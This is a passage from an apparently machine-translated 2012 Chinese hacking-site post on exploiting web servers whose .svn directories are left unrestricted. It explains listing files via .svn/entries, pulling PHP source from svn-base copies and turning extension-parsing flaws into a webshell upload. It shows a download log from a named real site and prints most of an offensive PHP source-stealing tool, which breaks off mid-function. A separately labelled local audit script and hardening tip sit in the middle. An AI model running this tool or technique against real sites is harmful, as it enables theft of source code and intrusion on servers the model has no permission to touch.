myhack58 | Anonymous (佚名) | MYHACK58:62201233461
Mar 27, 2012 - 12:00 a.m.

Summary of exploiting .svn directories that have no access restrictions (including the fix)

www.myhack58.com

The site uses .svn for version control in its production environment, but the .svn directory has no access restrictions, so the file and directory list can be traversed through .svn/entries. To save effort, I wrote a PHP script (http://rains.im/?q=node/18) to do this. If *.php.svn-base is not executed as PHP, then congratulations: the PHP source code kept by svn is handed to you, and analyzing the source code may help you find more vulnerabilities. If *.php.svn-base is treated as a PHP file and executed, you may see a PHP error message (revealing the real path) or a blank page. In that case, congratulations again: the site has an extension-recognition problem, and if you find a place to upload xxx.php.gif you may be able to get a webshell directly.
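A local audit for the exposure described above, as an added example that is not part of the original post: it walks a document root on the server's own filesystem and lists the pre-1.7 Subversion metadata a web server could hand out. The extension list, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import tempfile

# Assumed script extensions for a PHP deployment; adjust to the site's handlers.
SCRIPT_EXTS = (".php", ".phtml", ".inc")
SUFFIX = ".svn-base"
# Constructed sample layout (pre-1.7: one .svn directory per versioned directory).
SAMPLE = ("index.php", ".svn/entries", ".svn/text-base/index.php.svn-base",
          ".svn/text-base/style.css.svn-base", "admin/.svn/entries",
          "admin/.svn/text-base/login.php.svn-base")

def audit_docroot(docroot):
    """Return sorted (kind, relative_path) findings for Subversion metadata
    found under a local document root."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        parts = os.path.relpath(dirpath, docroot).split(os.sep)
        if ".svn" not in parts:
            continue
        for name in files:
            rel = "/".join(parts + [name])
            if name == "entries" and parts[-1] == ".svn":
                # Lists every file and subdirectory name of this directory.
                findings.append(("listing", rel))
            elif name.endswith(SUFFIX):
                original = name[: -len(SUFFIX)]
                # Pristine copy of a script: served as plain text, or executed
                # if the server matches ".php" anywhere in the file name.
                is_script = original.lower().endswith(SCRIPT_EXTS)
                kind = "script-source" if is_script else "pristine-copy"
                findings.append((kind, rel))
    return sorted(findings)

def build_sample_tree(root):
    """Write the constructed SAMPLE layout under root for the demonstration."""
    for rel in SAMPLE:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for kind, rel in audit_docroot(tmp):
            print(f"{kind:14} {rel}")
```

Deploying with `svn export` instead of a checkout leaves no `.svn` directories for the audit to find; where a working copy must stay on the server, deny requests for `.svn` paths in the web server configuration.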

Proof of vulnerability: /usr/local/bin/svn_clone -cvvvu http://www.2.newsmth.net

*** 下载 bbspsttmpl.php file
写入 bbspsttmpl.php to /data/src/www.2.newsmth.net (4190 bytes)
*** Download the default-sf.css file
Write default-sf.css to /data/src/www.2.newsmth.net (9700 bytes)
*** 下载 www2-admin.php file
写入 www2-admin.php to /data/src/www.2.newsmth.net (1819 bytes)
*** 下载 bbspst.php file
写入 bbspst.php to /data/src/www.2.newsmth.net (2716 bytes)

#!/usr/bin/php -q
<?php
/**
 * This script downloads the source code of websites whose .svn directory is
 * not access-restricted and whose svn version is lower than 1.7.
 * Please use PHP 5.3+ to run this script. To support lower versions, modify
 * the source code yourself. No need to notify me.
 * Author: 小雨@乌云
 * http://蛋疼.com
 */

# Error reporting level: only report errors
error_reporting(E_ERROR);
# Display errors
ini_set('display_errors', 'On');

define('VERSION', '1.0');
ini_set('user_agent', 'svn_clone(svn_clone v'.VERSION.'; by 小雨@乌云 email:[email protected]; http://蛋疼.com)');

# Cache directory, best placed on tmpfs. No cache lifetime is implemented,
# so to really fetch everything again you have to delete the cache directory by hand.
define('CACHE_DIR', '/tmp/cache');
# Path the code is saved to; a subdirectory named after the domain is created automatically
define('DATA_DIR', '/data/src');

# Debug information levels
define('NONE', 0);     # reported unconditionally
define('ERROR', 1);    # errors
define('WARNING', 2);  # warnings
define('ALL', 3);      # everything
define('EGGACHE', 4);  # joke level

# Get the parameters
$opts = getopt('u:chv', array('url:', 'color', 'help', 'verbose'));
# Get the URL passed in
$url = $opts['url'] ?: ($opts['u'] ?: null);
# Whether to display the help
$help = isset($opts['h']) + isset($opts['help']);
# Whether to use color
define('USECOLOR', isset($opts['c']) + isset($opts['color']));
# Debug information level: the more v's, the more detail, up to 3.
# Defined as a constant because I was too lazy to write "global" inside the functions.
define('VERBOSE', count($opts['v']) + count($opts['verbose']));

# The program name. I don't know whether this approach is compatible with
# other shells; with bash, at least, it works.
$cmd = basename($_SERVER['_']) == 'php' ? 'php '.$_SERVER['PHP_SELF'] : $_SERVER['_'];

if ($help or !$url) {
    die("Usage:\t$cmd option [url]\n".
        "\t-u --url\turl\tURL of the site you want to svn clone\n".
        "\t-c --color\t\tuse color output on the console\n".
        "\t-v --verbose\t\tprint more detailed information, more v's for more detail\n".
        "\t-h --help\t\tthis help information\n".
        "Examples:\n".
        "\t$cmd -u http://localhost\n".
        "\t$cmd -u http://localhost -cvv\n".
        "\t$cmd -vu http://localhost\n".
        "\t$cmd -cvvu http://localhost\n".
        "\t$cmd --url http://localhost --color --verbose --verbose --verbose someone is diligent to use this format?! Orz.\n"
    );
}

# I'm sick to my stomach... to write this line?..
debug("balls is a disease,be calm,don't ass…\n", EGGACHE);

svn_clone($url);

# Main function of this program
function svn_clone($url) {
    # Remove extra slashes at the end of the url
    $url = trim($url, '/');
    $entries_url = $url.'/.svn/entries';
    $content = get($entries_url);
    if (!$content) {
        return debug("$url is not a valid svn working copy!\n", ERROR);
    } elseif (strlen($content) < 10) {
        return debug("something too short,need little blue pills?\n", ERROR);
    }
    # Match the file and directory names in the entries file
    preg_match_all('/\f\n([^\n]+?)\s(\w+)\s/s', $content, $m) or debug("$entries_url does not contain files or subdirectories\n", WARNING);
    # Map each entry name to its type (file or dir)
    $files = array_combine($m[1], $m[2]);
    foreach ($files as $file => $type) {
        if ($type == 'dir') {
            debug(">>> entering directory $file\n", ALL);
